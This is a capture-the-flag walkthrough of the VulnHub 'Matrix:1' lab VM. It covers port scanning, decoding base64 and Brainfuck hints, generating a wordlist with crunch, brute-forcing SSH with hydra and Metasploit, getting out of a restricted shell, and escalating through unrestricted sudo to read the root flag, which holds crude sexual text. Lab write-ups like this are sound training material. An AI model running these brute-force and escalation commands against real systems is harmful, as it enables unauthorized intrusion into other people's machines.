Matrix
It has been a long time since I did a boot-2-root box from vulnhub.com.
If you don’t know the site and you’re interested learning pentesting skills or honing your skills, this is the right spot.
There are numerous of VM’s with different levels and most of them have a theme, which can be great fun.
When sites like hackthebox.eu weren’t there, this was the place to be for learning the right skills.
I have chosen to do ‘Matrix:1’ (link), created by Ajay Verma.
The level should be medium level and the goal is to get root and read /root/flag.txt.
As for hints…….follow your intuitions … and enumerate!
Let’s get cracking!
Enumeration
For my initial enumeration I use a tool called Red Team Kit (RTK), which has a automated recon scanner.
It does the port scanning and from the results will give some suggestions.
██████╗ ███████╗██████╗ ████████╗███████╗ █████╗ ███╗ ███╗ ██╗ ██╗██╗████████╗
██╔══██╗██╔════╝██╔══██╗ ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║ ██║ ██╔╝██║╚══██╔══╝
██████╔╝█████╗ ██║ ██║ ██║ █████╗ ███████║██╔████╔██║ █████╔╝ ██║ ██║
██╔══██╗██╔══╝ ██║ ██║ ██║ ██╔══╝ ██╔══██║██║╚██╔╝██║ ██╔═██╗ ██║ ██║
██║ ██║███████╗██████╔╝ ██║ ███████╗██║ ██║██║ ╚═╝ ██║ ██║ ██╗██║ ██║
╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝
Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/vulnhub/matrix
[-] What is the IP address of the target? 192.168.100.139
[*] Checking connection to target
[*] Connection to 192.168.100.139 established
[*] Starting a Masscan to find open ports on the target
[*] This can take some time as this is for TCP and UDP
[*] Parsing output and loading up for further analysis
[*] Starting a TCP nmap scan on the target with acquired ports to retrieve all information
[*] This can take some time
[*] There are no open UDP ports
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
22 tcp ssh OpenSSH 7.7 (protocol 2.0)
80 tcp http SimpleHTTPServer 0.6 (Python 2.7.14)
31337 tcp http SimpleHTTPServer 0.6 (Python 2.7.14)
#############################################################################################
[*] The following recommendations can be made:
[*] SSH
Try bruteforcing with the commands:
1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
(If nothing else works - try this as a last resort)
[*] WEB
To enumerate the directories run the command:
1.) python3 <path to dirsearch>/dirsearch.py -u 192.168.100.139 -e php -r -f -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?
It looks like there is a webserver listening on 2 ports and a SSH server on the default port.
Webserver
While starting DirSearch in the background, I open my browser to check out port 80 first.
Welcome in the Matrix!
When looking at the source code there is a picture to be found:
<div class="service"><img src="assets/img/p0rt_31337.png"/ width="15">
A white rabbit to be more precise.
The name of the picture is the hint, but that port I already got from the port scan.
Port 31337 is my next port to visit with my browser.
In the source code there is another hint…..this time in the form of a base64 encode comment:
<!--p class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=</p--> </div><!-- End / service -->
Let’s decode it.
root@kali:~/vulnhub/matrix# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
It looks like a Linux command where a string is echoed and redirected into a file called Cypher.matrix.
When directing my browser to http://192.168.100.139:31337/Cypher.matrix I get to download a file.
Let’s check out what it is:
root@kali:~/vulnhub/matrix# file Cypher.matrix Cypher.matrix: ASCII text root@kali:~/vulnhub/matrix# cat Cypher.matrix +++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++ +.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.- -.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+ +++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[- >++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- ----- -<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++ +[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+ +++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++< ]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[ ->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++ [->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---< ]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++ +[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- ----- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> ----- -.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+ +++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ .<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++ +++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<] >++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.- --.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++ ++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->- ----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++ +.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+ ++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[-> ---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----. <++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--. --.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+ +.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++ +.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[-> ----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+ +++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++< ]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++ +++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[-> ---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++ +++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++ [->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[-> ----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[- >---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.< +++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++ +++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<] >--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++< ]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++ .+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[ ->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++ +[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]> ----- ---.- --.<
This can be confusing if you see it for the first time, but if you have seen it before it is quit simple.
It is a esoteric programming language called Brainfuck. Brainfuck was designed for extreme minimalism and leads to obfuscated code, with programs containing only eight distinct characters.
There are numerous online decoders, I use https://www.splitbrain.org/_static/ook/ for the decoding part.
You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
Nice…..but there is a catch. I need to figure out the last characters to get it to work.
As for options I can try and brute force it, but mainly I try to use brute force as a last resort.
On Kali there a some password lists, so maybe it’s inside of one of the lists.
root@kali:/usr/share/wordlists# grep -r . -e "k1ll0r*" ./rockyou.txt:k1ll0watt ./rockyou.txt:k1ll0187 ./seclists/Passwords/Leaked-Databases/md5decryptor.uk.txt:k1ll0rd1e
Not really what I’m looking for as it doesn’t have 2 chars after the r, but three.
Let’s just try it and then brute forcing it with a loop.
root@kali:/usr/share/wordlists# ssh guest@192.168.100.139 The authenticity of host '192.168.100.139 (192.168.100.139)' can't be established. ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.100.139' (ECDSA) to the list of known hosts. guest@192.168.100.139's password: Permission denied, please try again.
Nope…..let’s turn to crunch.
SSH
Crunch is a tool to create wordlists. It is quit handy and easy to use.
Because I already have a part of the password and I know I’m missing two characters the syntax will be like this:
root@kali:~/vulnhub/matrix# crunch 8 8 -t k1ll0r%@ -o passlist.txt Crunch will now generate the following amount of data: 2340 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 260 crunch: 100% completed generating output
There are different ways to use the list and brute force SSH. I go for the SSH scanner from Metasploit.
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7i' [-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7j' [-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7k' [-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7l' [-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7m' [+] 192.168.100.139:22 - Success: 'guest:k1ll0r7n' 'uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare) Linux porteus 4.16.3-porteus #1 SMP PREEMPT Sat Apr 21 12:42:52 Local time zone must be set-- x86_64 Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz GenuineIntel GNU/Linux ' [*] Command shell session 1 opened (192.168.100.137:44711 -> 192.168.100.139:22) at 2019-02-13 21:32:26 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_login) >
That one worked.
root@kali:/usr/share/wordlists# ssh guest@192.168.100.139 guest@192.168.100.139's password: Last login: Mon Aug 6 16:25:44 2018 from 192.168.56.102 guest@porteus:~$
I’m in…now to do some recon on the system.
guest@porteus:~$ id -rbash: id: command not found
Dang…..looks like I entered into a restricted bash shell.
To get out of this restricted shell I need to know with what I can work with.
guest@porteus:~$ echo $PATH /home/guest/prog guest@porteus:~$ echo $SHELL /bin/rbash
To find out what commands I can use I double tab
guest@porteus:~$
! ]] builtin compgen declare echo eval fc getopts in ll mc pwd select suspend trap umask wait
./ alias caller complete dirs elif exec fg hash jobs local mcedit read set test true unalias while
: bg case compopt disown else exit fi help kill logout popd readarray shift then type unset {
[ bind cd continue do enable export for history la ls printf readonly shopt time typeset until }
[[ break command coproc done esac false function if let mapfile pushd return source times ulimit vi
I can try and find the thing I need to break free……..or I can hit up msfconsole again and do the ssh scanner again.
[*] Command shell session 1 opened (192.168.100.137:32967 -> 192.168.100.139:22) at 2019-02-13 21:47:17 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_login) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell linux SSH guest:k1ll0r7n (192.168.100.139:22) 192.168.100.137:32967 -> 192.168.100.139:22 (192.168.100.139) msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1 [*] Starting interaction with 1... id uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)
As you can see I’m not bothered with the restricted shell. Much better.
Now to get a proper TTY shell.
python -c 'import pty;pty.spawn("/bin/bash");'
guest@porteus:~$ id
id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)
Much better.
guest@porteus:~$ sudo -l
sudo -l
User guest may run the following commands on porteus:
(ALL) ALL
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cp
Ok….so normally I would check out the (root) and the (trinity) part of the sudo permission.
But in this case I can do everything as root with sudo….no strings attached.
guest@porteus:~$ sudo ls -lah /root
sudo ls -lah /root
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password: k1ll0r7n
total 74K
drwx------ 16 root root 4.0K Aug 14 2018 .
drwxr-xr-x 51 root root 4.0K Aug 6 2018 ..
-rw------- 1 root root 52 Aug 14 2018 .Xauthority
-rw------- 1 root root 6.1K Aug 14 2018 .bash_history
-rw-r--r-- 1 root root 79 Mar 5 2017 .bash_profile
-rw-r--r-- 1 root root 1.2K Apr 22 2018 .bashrc
drwx------ 5 root root 4.0K Aug 6 2018 .cache
drwxr-xr-x 21 root root 4.0K Aug 13 2018 .config
drwx------ 3 root root 4.0K Aug 6 2018 .dbus
-rw------- 1 root root 16 Aug 6 2018 .esd_auth
drwx------ 4 root root 4.0K Aug 6 2018 .thumbnails
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Desktop
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Documents
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Downloads
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Music
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Pictures
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Public
drwxr-xr-x 2 root root 4.0K Aug 6 2018 Videos
-rw-r--r-- 1 root root 691 Aug 14 2018 flag.txt
guest@porteus:~$ sudo cat /root/flag.txt
sudo cat /root/flag.txt
_,-.
,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_. IN THE MATRIX AND BEAT OFF
|`-._`-.\,-'_| _,-'.
`-.|.-' | |`.-'|_ WHAT
| |_|,-'_`.
|-._,-' | NO, ME NEITHER
jrei | | _,'
'-|_,-' IT'S JUST A HYPOTHETICAL QUESTION
guest@porteus:~$
And there you have it. I don’t know if this was the intended way of the creator, but hey!….whatever gets it to work.